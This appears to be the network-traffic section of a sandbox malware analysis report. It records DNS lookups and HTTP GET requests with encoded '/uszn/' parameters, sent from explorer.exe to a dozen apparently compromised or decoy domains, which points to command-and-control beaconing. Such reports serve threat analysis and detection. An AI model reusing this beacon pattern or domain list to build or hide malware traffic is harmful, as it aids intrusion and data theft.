                                                                        Feb 23, 2021 10:07:24.475516081 CET6152253192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:24.538213968 CET53615228.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:25.307122946 CET5233753192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:25.369857073 CET53523378.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:25.831712008 CET5504653192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:25.891031027 CET53550468.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:26.717438936 CET4961253192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:26.774847031 CET53496128.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:27.568881035 CET4928553192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:27.625801086 CET53492858.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:28.630475998 CET5060153192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:28.687613010 CET53506018.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:28.787297964 CET6087553192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:28.836028099 CET53608758.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:29.653798103 CET5644853192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:29.736443996 CET53564488.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:30.457689047 CET5917253192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:30.519557953 CET53591728.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:33.788086891 CET6242053192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:34.111540079 CET53624208.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:35.093751907 CET6057953192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:35.152369976 CET53605798.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:39.826229095 CET5018353192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:39.901096106 CET53501838.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:45.170499086 CET6153153192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:45.274060011 CET53615318.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:50.495853901 CET4922853192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:50.556087017 CET53492288.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:07:55.765499115 CET5979453192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:07:55.909749031 CET53597948.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:01.316922903 CET5591653192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:01.609078884 CET53559168.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:07.241117001 CET5275253192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:08.043203115 CET53527528.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:13.424010992 CET6054253192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:13.486955881 CET53605428.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:15.674170971 CET6068953192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:15.722968102 CET53606898.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:17.635176897 CET6420653192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:17.703160048 CET53642068.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:18.501543045 CET5090453192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:18.562619925 CET53509048.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:23.691322088 CET5752553192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:23.758831978 CET53575258.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:28.857777119 CET5381453192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:29.010719061 CET53538148.8.8.8192.168.2.4
                                                                        Feb 23, 2021 10:08:34.280643940 CET5341853192.168.2.48.8.8.8
                                                                        Feb 23, 2021 10:08:34.656076908 CET53534188.8.8.8192.168.2.4

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Feb 23, 2021 10:07:33.788086891 CET192.168.2.48.8.8.80xbdbfStandard query (0)www.fastenerspelosato.netA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:07:39.826229095 CET192.168.2.48.8.8.80x44b2Standard query (0)www.sissysundays.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:07:45.170499086 CET192.168.2.48.8.8.80xc969Standard query (0)www.whereinthezooareyou.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:07:50.495853901 CET192.168.2.48.8.8.80x124bStandard query (0)www.fertinvitro.doctorA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:07:55.765499115 CET192.168.2.48.8.8.80x84aStandard query (0)www.dgcsales.netA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:01.316922903 CET192.168.2.48.8.8.80xa3d7Standard query (0)www.horisan-touki.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:07.241117001 CET192.168.2.48.8.8.80xd8a9Standard query (0)www.karthikeyainfraindia.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:13.424010992 CET192.168.2.48.8.8.80x23bdStandard query (0)www.guilhermeoliveiro.siteA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:18.501543045 CET192.168.2.48.8.8.80x59b6Standard query (0)www.buysellleasewithlisa.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:23.691322088 CET192.168.2.48.8.8.80x6122Standard query (0)www.besteprobioticakopen.onlineA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:28.857777119 CET192.168.2.48.8.8.80x81e3Standard query (0)www.grandwhale.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:34.280643940 CET192.168.2.48.8.8.80xd8a3Standard query (0)www.smallbathroomdecor.infoA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Feb 23, 2021 10:07:34.111540079 CET8.8.8.8192.168.2.40xbdbfNo error (0)www.fastenerspelosato.net142.91.239.112A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:07:39.901096106 CET8.8.8.8192.168.2.40x44b2No error (0)www.sissysundays.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 10:07:39.901096106 CET8.8.8.8192.168.2.40x44b2No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:07:45.274060011 CET8.8.8.8192.168.2.40xc969No error (0)www.whereinthezooareyou.comwww9.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 10:07:45.274060011 CET8.8.8.8192.168.2.40xc969No error (0)www9.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 10:07:45.274060011 CET8.8.8.8192.168.2.40xc969No error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 10:07:45.274060011 CET8.8.8.8192.168.2.40xc969No error (0)5f36b111-balancer.wixdns.nettd-balancer-euw2-6-109.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 10:07:45.274060011 CET8.8.8.8192.168.2.40xc969No error (0)td-balancer-euw2-6-109.wixdns.net35.246.6.109A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:07:50.556087017 CET8.8.8.8192.168.2.40x124bNo error (0)www.fertinvitro.doctorfertinvitro.doctorCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 10:07:50.556087017 CET8.8.8.8192.168.2.40x124bNo error (0)fertinvitro.doctor34.102.136.180A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:07:55.909749031 CET8.8.8.8192.168.2.40x84aNo error (0)www.dgcsales.netdgcsales.netCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 10:07:55.909749031 CET8.8.8.8192.168.2.40x84aNo error (0)dgcsales.net184.106.16.223A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:01.609078884 CET8.8.8.8192.168.2.40xa3d7No error (0)www.horisan-touki.com118.27.99.84A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:08.043203115 CET8.8.8.8192.168.2.40xd8a9No error (0)www.karthikeyainfraindia.comkarthikeyainfraindia.comCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 10:08:08.043203115 CET8.8.8.8192.168.2.40xd8a9No error (0)karthikeyainfraindia.com202.66.173.116A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:13.486955881 CET8.8.8.8192.168.2.40x23bdName error (3)www.guilhermeoliveiro.sitenonenoneA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:18.562619925 CET8.8.8.8192.168.2.40x59b6No error (0)www.buysellleasewithlisa.combuysellleasewithlisa.comCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 10:08:18.562619925 CET8.8.8.8192.168.2.40x59b6No error (0)buysellleasewithlisa.com160.153.136.3A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:23.758831978 CET8.8.8.8192.168.2.40x6122No error (0)www.besteprobioticakopen.online94.23.162.163A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:29.010719061 CET8.8.8.8192.168.2.40x81e3No error (0)www.grandwhale.comHDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 10:08:29.010719061 CET8.8.8.8192.168.2.40x81e3No error (0)HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com3.223.115.185A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 10:08:34.656076908 CET8.8.8.8192.168.2.40xd8a3No error (0)www.smallbathroomdecor.info88.214.207.96A (IP address)IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • www.fastenerspelosato.net
                                                                        • www.sissysundays.com
                                                                        • www.whereinthezooareyou.com
                                                                        • www.fertinvitro.doctor
                                                                        • www.dgcsales.net
                                                                        • www.horisan-touki.com
                                                                        • www.karthikeyainfraindia.com
                                                                        • www.buysellleasewithlisa.com
                                                                        • www.besteprobioticakopen.online

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.449755142.91.239.11280C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 10:07:34.316319942 CET2184OUTGET /uszn/?I48=ilzBSMt+mC5PnIueaE0o4kFNHHW8rQxTZUVxaBcrk7HNT8xc6ayAEkd5Nrf40/DEmyGF&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.fastenerspelosato.net
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:07:34.844446898 CET2186INHTTP/1.1 500 Internal Server Error
                                                                        Cache-Control: private
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Server: Microsoft-IIS/8.5
                                                                        X-AspNet-Version: 4.0.30319
                                                                        X-Powered-By: ASP.NET
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Headers: *
                                                                        Access-Control-Allow-Methods: GET, POST
                                                                        Date: Tue, 23 Feb 2021 09:07:20 GMT
                                                                        Connection: close
                                                                        Content-Length: 4112
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e5 80 bc e4 b8 8d e8 83 bd e4 b8 ba 20 6e 75 6c 6c e3 80 82 3c 62 72 3e e5 8f 82 e6 95 b0 e5 90 8d 3a 20 69 6e 70 75 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 31 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 74 3b 63 6f 6c 6f 72 3a 72 65 64 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 32 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 74 3b 63 6f 6c 6f 72 3a 6d 61 72 6f 6f 6e 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 43 6f 6e 73 6f 6c 61 73 22 2c 22 4c 75 63 69 64 61 20 43 6f 6e 73 6f 6c 65 22 2c 4d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 34 70 74 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 72 6b 65 72 20 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 78 70 61 6e 64 61 62 6c 65 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 6e 61 76 79 3b 20 63 75 72 73 6f 72 3a 68 61 6e 64 3b 20 7d 0d 0a 20 20
                                                                        Data Ascii: <!DOCTYPE html><html> <head> <title> null<br>: input</title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.44976123.227.38.7480C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 10:07:39.943531036 CET5544OUTGET /uszn/?I48=52ikA0v5VO8qsylJfSO1DetMiatJe0E1D9rBoJ+nHZYmtxf70roQflY+S8wYouTF3o6y&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.sissysundays.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:07:40.155996084 CET5545INHTTP/1.1 403 Forbidden
                                                                        Date: Tue, 23 Feb 2021 09:07:40 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        X-Sorting-Hat-PodId: 162
                                                                        X-Sorting-Hat-ShopId: 41524953251
                                                                        X-Dc: gcp-us-central1
                                                                        X-Request-ID: a4514485-1370-4802-9169-ac7871220421
                                                                        Set-Cookie: _shopify_fs=2021-02-23T09%3A07%3A40Z; Expires=Wed, 23-Feb-22 09:07:40 GMT; Domain=sissysundays.com; Path=/; SameSite=Lax
                                                                        X-Download-Options: noopen
                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                        X-Content-Type-Options: nosniff
                                                                        X-XSS-Protection: 1; mode=block
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 086fbdfb48000005c87fa67000000001
                                                                        Server: cloudflare
                                                                        CF-RAY: 625fcc3edc8705c8-FRA
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e
                                                                        Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{fon


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        2192.168.2.44976235.246.6.10980C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 10:07:45.340125084 CET5574OUTGET /uszn/?I48=lR8nCh02VBrVevH9DBfx7BVzy1/OBYfsNcE9m+G8n0i7QYmfgEfs3uLKSpan4882ouVy&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.whereinthezooareyou.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:07:45.453417063 CET5575INHTTP/1.1 301 Moved Permanently
                                                                        Date: Tue, 23 Feb 2021 09:07:45 GMT
                                                                        Content-Length: 0
                                                                        Connection: close
                                                                        location: https://www.robinblumenthal.org/uszn?I48=lR8nCh02VBrVevH9DBfx7BVzy1%2FOBYfsNcE9m+G8n0i7QYmfgEfs3uLKSpan4882ouVy&ofrxU=yVMtQLoX
                                                                        strict-transport-security: max-age=120
                                                                        x-wix-request-id: 1614071265.391552393778121902
                                                                        Age: 0
                                                                        Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                                        X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkViPPFLGwJgVO8FUAmFQQjPN,qquldgcFrj2n046g4RNSVAWNqgzSMQ+UB9IQX4udZ+Q=,2d58ifebGbosy5xc+FRalpYUTcl7jQzo4Essi/VLLwgt8VDvZy3pJDWZp9dMiwKn3fKEXQvQlSAkB/lstal9R4Q918uQbzzG9w1LffIdX9I=,2UNV7KOq4oGjA5+PKsX47F8xRgV30iIDzySL0NmaUxo=,m7d0zj9X6FBqkyAIyh66vEUuqjNSZoImFoqkUKlu7gqTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,4EmzKGKKpFffqfFwZRPY8boZ8ve2m8xk1D+l4lZPQBgFvmIDoEcoOIUTBKMVcbKcH2yWikl2EP5bJKtoyukhjw==
                                                                        Cache-Control: no-cache
                                                                        Expires: -1
                                                                        Server: Pepyaka/1.19.0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        3192.168.2.44976334.102.136.18080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 10:07:50.608117104 CET5576OUTGET /uszn/?I48=z5jHb1CZWrsr2p16zetrIsrl3FBZKeiByVV0oSV+dvaqVG1rneJc4YmewlelB8A40GEQ&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.fertinvitro.doctor
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:07:50.751897097 CET5577INHTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Tue, 23 Feb 2021 09:07:50 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "6031584e-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        4192.168.2.449764184.106.16.22380C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 10:07:56.064671040 CET5577OUTGET /uszn/?I48=hu5lsjyQ8jtyvTSzqUKsO9FdlIq7HJAoGWXF85Byxyx8kG/0QeCZ2D448NGSTsl89HtB&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.dgcsales.net
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:07:56.290729046 CET5578INHTTP/1.1 302 Found
                                                                        cache-control: private
                                                                        content-type: text/html; charset=utf-8
                                                                        location: http://www.dmt.ca/nosite.html
                                                                        date: Tue, 23 Feb 2021 09:07:56 GMT
                                                                        content-length: 146
                                                                        connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 6d 74 2e 63 61 2f 6e 6f 73 69 74 65 2e 68 74 6d 6c 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.dmt.ca/nosite.html">here</a>.</h2></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        5192.168.2.449765118.27.99.8480C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 10:08:01.909493923 CET5580OUTGET /uszn/?I48=QfBSKsl5Vu8QEYvg6r6EpYBO+tHghinNKHDEOdj6/CEQOiVDlwCi9gx1TH+D8HDA3Ujy&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.horisan-touki.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:08:02.207866907 CET5580INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Tue, 23 Feb 2021 09:08:02 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.horisan-touki.com/uszn/?I48=QfBSKsl5Vu8QEYvg6r6EpYBO+tHghinNKHDEOdj6/CEQOiVDlwCi9gx1TH+D8HDA3Ujy&ofrxU=yVMtQLoX
